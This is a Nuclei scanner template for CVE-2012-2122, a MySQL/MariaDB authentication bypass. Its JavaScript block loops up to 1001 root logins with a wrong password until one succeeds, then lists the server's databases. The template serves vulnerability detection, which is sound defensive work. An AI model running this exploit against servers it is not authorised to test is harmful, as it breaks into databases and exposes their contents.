nuclei-templates/javascript/cves/2012/CVE-2012-2122.yaml

id: CVE-2012-2122

info:
  name: MySQL - Authentication Bypass
  author: pussycat0x
  severity: medium
  description: |
    sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.    
  reference:
    - https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
    - http://kb.askmonty.org/en/mariadb-5162-release-notes/
    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
    - http://security.gentoo.org/glsa/glsa-201308-06.xml
    - http://securitytracker.com/id?1027143
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P
    cvss-score: 5.1
    cve-id: CVE-2012-2122
    cwe-id: CWE-287
    epss-score: 0.9681
    epss-percentile: 0.99685
    cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: mysql
    shodan-query:
      - "product:\"MySQL\""
      - product:"mysql"
  tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);      
    code: |
      const mysql = require('nuclei/mysql');
      const client = new mysql.MySQLClient;
      for (let i = 1; i <= 1001; i++) {
      try {
      const connected = client.ExecuteQuery(Host, Port, User, Pass, Query);
      Export(connected);
      break;
      } catch {
        // error
      }
      }      

    args:
      Host: "{{Host}}"
      Port: 3306
      User: "root"
      Pass: "wrong"
      Query: "show databases;"

    matchers:
      - type: dsl
        dsl:
          - "success == true"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[] | .Database
# digest: 4a0a0047304502207fa11d2a7dbb88837eb0ae592716b8a335a68e751bf3d72680406af18e40e484022100ba836bfec0daf4f5dd1cdfa594c59a8f139e7289c66b9bf49bc0e529a6a9b903:922c64590222798bb761d5b6d8e72950